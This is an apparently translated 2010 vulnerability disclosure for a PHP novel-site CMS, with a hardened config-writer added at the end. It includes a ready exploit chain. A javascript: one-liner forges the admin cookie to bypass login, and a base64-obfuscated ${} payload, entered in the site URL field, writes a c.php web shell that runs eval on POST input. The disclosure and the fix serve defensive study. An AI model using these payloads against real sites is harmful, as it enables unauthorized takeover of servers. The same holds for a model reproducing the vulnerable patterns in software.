A marginal vulnerability in the Cold di novel program - vulnerability warning - the black bar safety net

2010-02-03T00:00:00
ID MYHACK58:62201026133
Type myhack58
Reporter Anonymous
Modified 2010-02-03T00:00:00

Description

While browsing chinaz I found that this system has nearly 3w downloads, so I went back and read through the code and found a marginal (low-value) vulnerability. The analysis follows:

Looking at the backend login page /admin/login.php:

    <?
    include('data.php');
    if($_POST['password']==$password & $_POST['adminname']==$adminname){
        // on success the cookie value is simply the admin username
        setcookie("x_Cookie", $adminname);
        echo"<script>location.href='admin.php';</script>";
        exit;
    }else{
        echo"<script>alert('username or password error!!!'); location.href='index.php';</script>";
    }
    ?>

The variables $password and $adminname are declared in data.php:

    <?
    $adminname="admin";
    $password="admin";
    ?>

Now look at its verification code:

    <?
    include('data.php');
    // the only check: the cookie value equals the admin username
    if($_COOKIE['x_Cookie'] ==$adminname){
        echo"<script>location.href='admin.php';</script>";
        exit;
    }
    ?>

This check only compares the username, and the username is taken from the cookie. It works as long as the admin username has not been modified, and that is what makes the vulnerability marginal. But many administrators did not change the username, including the official site, so a forged cookie gets you into the backend. exp:

    javascript:alert(document.cookie="x_Cookie=admin");location.href='/admin/admin.php';

Getting a webshell from the backend is still relatively simple. See the code that saves the basic system parameters in the backend file admin_man.php:

    <?

    }elseif ($id=='save'){
        if(function_exists("curl_init")){$isfun="curl";}
        elseif(function_exists("fopen")){$isfun="fopen";}
        $link = str_replace("\r\n",";",$_POST['link']);
        // POST values are concatenated unescaped into PHP source, most of them inside double quotes
        $con='<?'."\r\n".'$fromurl = base64_decode(\'aHR0cDovL3d3dy5xaWFuemFpLmNvbS8=\');'."\r\n"
            .'$sitename='.'"'.$_POST['sitename'].'"'.";\r\n"
            .'$isfun='.'"'.$isfun.'"'.";\r\n"
            .'$flush='.$_POST['flush'].";\r\n"
            .'$reurl='.'"'.$_POST['reurl'].'"'.";\r\n"
            .'$html='.'"'.$_POST['html'].'"'.";\r\n"
            .'$keywords='.'"'.$_POST['keywords'].'"'.";\r\n"
            .'$email='.'"'.$_POST['email'].'"'.";\r\n"
            .'$siteurl='.'"'.$_POST['siteurl'].'"'.";\r\n"
            .'$link='.'\''.$link.'\''.";\r\n"
            .'$tongji='.'\''.stripslashes($_POST['tongji']).'\''.";\r\n?>";
        // the generated source is written to config.php
        $fp=fopen("../config.php","w");
        fwrite($fp,$con);
        fclose($fp);
        echo"<script>alert('modify success!'); location.href='?id=man';</script>";
        exit;
    }
    ?>

This uses the way PHP evaluates expressions inside double-quoted strings. In the backend, under "basic system parameters", write the following in the "site URL:" field:

    ${${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgpz4x))}}

After saving, visiting /config.php generates c.php in the root directory, whose code is <?php @eval($_POST[c]); ?>1

The vulnerability is fairly simple and of marginal value; experts, please don't laugh.
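
A hardened version of the config-writing step analyzed above, as an added example that is not the project's own code: every submitted value is serialized with var_export() so it loads as inert text. The field names follow the page; build_config(), the constructed sample input and the temp-file self-check are assumptions, and the constant $fromurl line is left out.

```php
<?php
// Added example, not the project's code. Field names follow the page;
// build_config() and the temp-file self-check are assumptions.

function build_config(array $post, string $isfun): string
{
    // Settings the original wrapped in double (or raw single) quotes.
    $fields = ['sitename', 'reurl', 'html', 'keywords', 'email', 'siteurl', 'tongji'];
    $lines = ['<?php'];
    // var_export() emits a single-quoted literal with ' and \ escaped, so
    // "$var" and "${...}" inside a value stay inert text when config.php loads.
    $lines[] = '$isfun = ' . var_export($isfun, true) . ';';
    // 'flush' was written with no quotes at all; force it to an integer.
    $lines[] = '$flush = ' . (int)($post['flush'] ?? 0) . ';';
    foreach ($fields as $name) {
        $value = (string)($post[$name] ?? '');
        $lines[] = '$' . $name . ' = ' . var_export($value, true) . ';';
    }
    $link = str_replace("\r\n", ';', (string)($post['link'] ?? ''));
    $lines[] = '$link = ' . var_export($link, true) . ';';
    return implode("\n", $lines) . "\n";
}

// Constructed sample input: harmless values using the risky syntax.
$sample = [
    'siteurl'  => '${${strtoupper("x")}}',
    'sitename' => "a'b\\",
    'flush'    => '1; echo 1',
];
$tmp = tempnam(sys_get_temp_dir(), 'cfg');
file_put_contents($tmp, build_config($sample, 'curl'), LOCK_EX);
include $tmp; // defines $siteurl, $sitename, $flush ... in this scope
unlink($tmp);

// Values must come back as the exact text that was submitted.
if ($siteurl !== $sample['siteurl'] || $sitename !== $sample['sitename'] || $flush !== 1) {
    throw new RuntimeException('config round-trip mismatch');
}
echo "config round-trip OK\n";
```

This covers only the config-writing step; the x_Cookie username check shown earlier still needs to be replaced with server-side session state.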